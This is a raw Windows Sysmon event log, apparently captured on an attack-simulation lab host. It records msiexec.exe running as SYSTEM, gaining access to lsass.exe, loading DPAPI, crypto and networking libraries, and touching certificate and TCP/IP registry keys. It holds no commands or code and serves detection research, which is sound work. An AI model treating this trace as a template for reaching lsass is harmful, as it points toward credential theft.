15:05:02.272{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002691482Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.272{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI3697.tmp2022-06-17 15:05:02.272NT AUTHORITY\SYSTEM 734700x80000000000000002691481Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.069{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\dpapi.dll10.0.14393.0 (rs1_release.160715-1616)Data Protection APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdpapi.dllMD5=927EA28A3F416A5A5E9FC638CA245EF5,SHA256=D399633CC99D754DD999BB4FFADD768FEA82F57A0241809117AD786DC33DD30EtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 12241200x80000000000000002691480Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.069{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CANT AUTHORITY\SYSTEM 12241200x80000000000000002691479Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.069{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\RootNT AUTHORITY\SYSTEM 12241200x80000000000000002691471Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CANT AUTHORITY\SYSTEM 12241200x80000000000000002691470Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\RootNT AUTHORITY\SYSTEM 12241200x80000000000000002691469Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CANT AUTHORITY\SYSTEM 12241200x80000000000000002691468Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CANT AUTHORITY\SYSTEM 12241200x80000000000000002691467Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CANT AUTHORITY\SYSTEM 12241200x80000000000000002691466Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CANT AUTHORITY\SYSTEM 12241200x80000000000000002691465Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRootNT AUTHORITY\SYSTEM 12241200x80000000000000002691464Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\RootNT AUTHORITY\SYSTEM 12241200x80000000000000002691463Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\RootNT AUTHORITY\SYSTEM 12241200x80000000000000002691462Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRootNT AUTHORITY\SYSTEM 12241200x80000000000000002691461Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOTNT AUTHORITY\SYSTEM 12241200x80000000000000002691460Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOTNT AUTHORITY\SYSTEM 13241300x80000000000000002691459Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500_Classes\Local Settings\MuiCache\13b\52C64B7E\LanguageListBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002691458Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500_Classes\Local Settings\MuiCache\13b\52C64B7E\LanguageListBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002691457Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500_Classes\Local Settings\MuiCache\13b\52C64B7E\LanguageListBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002691456Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500_Classes\Local Settings\MuiCache\13b\52C64B7E\LanguageListBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002691455Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500_Classes\Local Settings\MuiCache\13b\52C64B7E\LanguageListBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002691454Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500_Classes\Local Settings\MuiCache\13b\52C64B7E\LanguageListBinary DataNT AUTHORITY\SYSTEM 734700x80000000000000002691453Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ncryptsslp.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft SChannel ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationncryptsslp.dllMD5=80D0046E61E3DBD708B53657DA4C5821,SHA256=7457E1BB911D132A8BEDEB6D7DEDB82365A6D681FBEF2331D4FB545AC1DA5A56trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691452Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ntasn1.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft ASN.1 APIMicrosoft® Windows® Operating SystemMicrosoft Corporationntasn1.dllMD5=A45B23E8D2623CE3F760377766AF3E24,SHA256=E0A8F5055CD9E2AF029B8537E09EFFAF1F46C724CB720A6395DCF563EF70B843trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691451Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ncrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows NCrypt RouterMicrosoft® Windows® Operating SystemMicrosoft Corporationncrypt.dllMD5=025DBE9D0F7AE719C64DE3A4555A7C0A,SHA256=1A223828A444E7797A9E00632DAE81AC3AC68B38786E67912B1C3FC6118FB6B4trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691450Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.616{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mskeyprotect.dll10.0.14393.4046 (rs1_release.201028-1803)Microsoft Key Protection ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmskeyprotect.dllMD5=87A5C9919D4A67629718959772E120DD,SHA256=707BD6ECE458848F7343C2CF3184A74D99C40E7F5E58E5DA608E4C88D03609E4trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 12241200x80000000000000002691447Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.584{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNELNT AUTHORITY\SYSTEM 734700x80000000000000002691446Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.584{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691444Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.584{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\crypt32.dll10.0.14393.4946 (rs1_release.220131-0721)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=341C44C830FB5D4FA58EF6276D9D2511,SHA256=988C82047689A625BA54959D2DB401A6891B9C00CF8A262842FBA2F032519283trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691430Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.569{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\schannel.dll10.0.14393.5125 (rs1_release.220429-1732)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=6E1B17C60BE7B7BB5D75BDB52B84B18C,SHA256=281F48D64784B48E0AAA6C3D5EC429C055977A3E65E818F5C8A3F8163ABBB264trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691396Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.569{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691393Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691371Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 12241200x80000000000000002691368Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\Tcpip\ParametersNT AUTHORITY\SYSTEM 12241200x80000000000000002691367Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\Tcpip\ParametersNT AUTHORITY\SYSTEM 12241200x80000000000000002691366Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\Tcpip\ParametersNT AUTHORITY\SYSTEM 12241200x80000000000000002691365Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\Tcpip\ParametersNT AUTHORITY\SYSTEM 12241200x80000000000000002691364Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\Tcpip\ParametersNT AUTHORITY\SYSTEM 12241200x80000000000000002691363Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\Tcpip\ParametersNT AUTHORITY\SYSTEM 12241200x80000000000000002691362Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\Tcpip\ParametersNT AUTHORITY\SYSTEM 12241200x80000000000000002691361Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCacheNT AUTHORITY\SYSTEM 734700x80000000000000002691360Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691359Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\winnsi.dll10.0.14393.2339 (rs1_release_inmarket.180611-1502)Network Store Information RPC interfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationwinnsi.dllMD5=25B3BD4D63460EE4599F5631C1B83D21,SHA256=07E055D47940F09CB7EB512D52672C944D7D2F035A2F45766319871C0862C5B1trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691357Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\webio.dll10.0.14393.3866 (rs1_release.200805-1327)Web Transfer Protocols APIMicrosoft® Windows® Operating SystemMicrosoft Corporationwebio.dllMD5=0CE65DF03820B5523EFE7D20258E6F0A,SHA256=9224732E1A7761866BB479C91A02C561F77B203EB20914F4ED0AF8FE320E8FF6trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691356Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\dhcpcsvc.dll10.0.14393.3930 (rs1_release.200901-1914)DHCP Client ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc.dllMD5=CD3B9633BBEF2102C4665A2C39EC0B1A,SHA256=341EFB4806BE39E09AA90CA3B069C39F2A9D61FA9B512350B2721D41875AFCAEtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691322Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\dhcpcsvc6.dll10.0.14393.3930 (rs1_release.200901-1914)DHCPv6 ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc6.dllMD5=1721EAC44BCFC7177AA664ADCA514F23,SHA256=C099BCCE44A04A48147DE8CF093EBF997510154113789BF31394B5148F60B375trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691292Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691291Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691290Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\OnDemandConnRouteHelper.dll10.0.14393.4169 (rs1_release.210107-1130)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=BAE78E97BEBB832376654560305922E3,SHA256=6A188DC4F1005E46CCA529E9C757D9B3B5F98E5587AFAA5E4200C7DD2AC73355trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691289Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691288Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\winhttp.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=44DF25F229E9374FA1290BE1CA03026B,SHA256=A446A296E85934FD9D10D7BD5B086FE6B4972FD7E93D4CC0ADC1068DD7A5AD81trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691287Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 18141800x80000000000000002691284Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-ConnectPipe2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840\wkssvcC:\Windows\system32\msiexec.exeNT AUTHORITY\SYSTEM 734700x80000000000000002691282Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691281Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.537{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000002691280Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691279Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000002691278Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691277Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=E0F286AF345442E267C33880492CED31,SHA256=5C6D66F5A748551999BE1CDE33A3A1FC2E10D1297EF275D232A9FDCC95BEA84BtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 